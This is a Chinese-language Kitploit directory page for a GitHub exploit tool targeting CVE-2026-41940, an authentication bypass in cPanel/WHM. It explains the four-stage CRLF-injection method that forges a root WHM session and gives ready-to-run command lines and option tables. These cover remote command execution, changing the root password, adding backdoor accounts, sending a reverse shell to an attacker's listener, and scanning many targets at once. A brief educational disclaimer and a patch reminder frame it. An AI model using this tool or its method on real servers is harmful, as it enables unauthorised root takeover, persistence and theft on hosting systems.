Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41940 — cPanel/WHM 身份验证绕过(零日漏洞) | Kitploit
工具/GitHubGitHub/kill1234545/cve-2026-41940
身份验证与授权权限提升持久化机制漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用渗透测试
GitHubkill1234545/cve-2026-41940

CVE-2026-41940

cPanel/WHM 身份验证绕过(零日漏洞)

查看仓库
1023个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-41940:cPanel/WHM 身份验证绕过(单目标与多目标)

免责声明: 本文档及关联脚本(exploit.py)仅用于教育目的、安全研究和授权渗透测试。请勿将该软件用于您不拥有或未经明确许可测试的系统。

概述

exploit.py 是一个演示 cPanel 与 WHM 中身份验证绕过漏洞(CVE-2026-41940)的脚本。该漏洞允许未认证的攻击者通过 CRLF 注入缺陷,将 root 会话注入守护进程缓存,最终在无需有效凭据的情况下获得 root 级 WHM 访问权限。

漏洞分析与利用流程

该漏洞利用 Basic Authentication 处理机制中的 CRLF(回车换行)注入漏洞,并结合会话传播缺陷。该脚本分四个阶段自动化执行攻击:

  1. 预认证会话铸造: 连接公开登录端点(例如 /login/ 或 /cgi/login.cgi),获取一个未认证的基线会话 Cookie(whostmgrsession)。
  2. CRLF 注入: 发送一个包含 Base64 编码载荷的恶意 Basic Authentication 头,将 root 会话字段直接注入 cpsrvd 会话缓存。服务器的重定向响应会泄露生成的 security token(cpsess)。
  3. 会话传播: 将原始会话 Cookie 发送到已认证的 WHM 端点,触发 do_token_denied 将伪造会话传播到守护进程缓存——使其成为有效的已认证会话。
  4. 验证: 使用伪造会话访问受限的 WHM API 端点(例如 /json-api/version),确认 root 级访问权限。

先决条件

  • Python 3.x
  • requests 库
root@kitploit:~
pip install requests

用法

root@kitploit:~
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

参数

目标选择

参数描述
--target URL单个 WHM URL(例如 https://target:2087)
--target-file FILE包含目标的文件(每行一个 ip:port)——自动启用检查模式

网络与核心选项

利用选项(绕过后)

输出选项

参数描述
--output FILE将会话 token 和详细信息保存到 JSON 文件

示例

root@kitploit:~
# Check if target is vulnerable
python exploit.py --target https://target:2087 --check

# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump

# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session

# Execute a command
python exploit.py --target https://target:2087 --exec "id"

# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell

# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json

交互式 Shell 命令

使用 --shell 时,以下命令可用:


提醒

请立即更新最新的 cPanel/WHM 安全补丁。

下载工具
参数描述
--threads N多目标模式下的并发线程数(默认:10)
--hostname HOST覆盖 Host 头——在自动发现失败或主机名错误时使用
--timeout N每个请求的超时时间(秒)(默认:15)
--retries N网络错误时的重试次数(默认:3)
--cookie-name NAME强制指定会话 Cookie 名称(未指定时自动检测)
--no-verify跳过第 4 阶段验证并继续执行
参数描述
--check仅检查模式——验证漏洞但不利用(使用 --target-file 时自动设置)
--password PASS将 root 密码更改为 PASS
--api FUNC调用特定的 WHM JSON-API 函数
--api-params K=V,...--api 的逗号分隔参数
--exec CMD通过 WHM scripts/run_script 执行操作系统命令(备用:rawexec)
--session生成一个 root 一键登录 URL——请立即打开,token 过期很快
--shell进入交互式 WHM shell(仅限单目标)
--dump转储服务器信息:版本、账户、DNS 区域、权限
--add-user USER PASS DOMAIN创建新的 cPanel 托管账户
--revshell LHOST LPORT向您的监听器发送 bash 反向 shell
命令描述
api <function> [k=v ...]调用 WHM JSON-API 函数(例如 api version)
exec <command>通过 WHM 运行操作系统命令(例如 exec id)
passwd <newpass>更改 root 密码
dump转储服务器信息
revshell <lhost> <lport>发送反向 shell
add <user> <pass> <domain>创建 cPanel 账户
save <path>将当前会话保存到文件
exit / quit退出 shell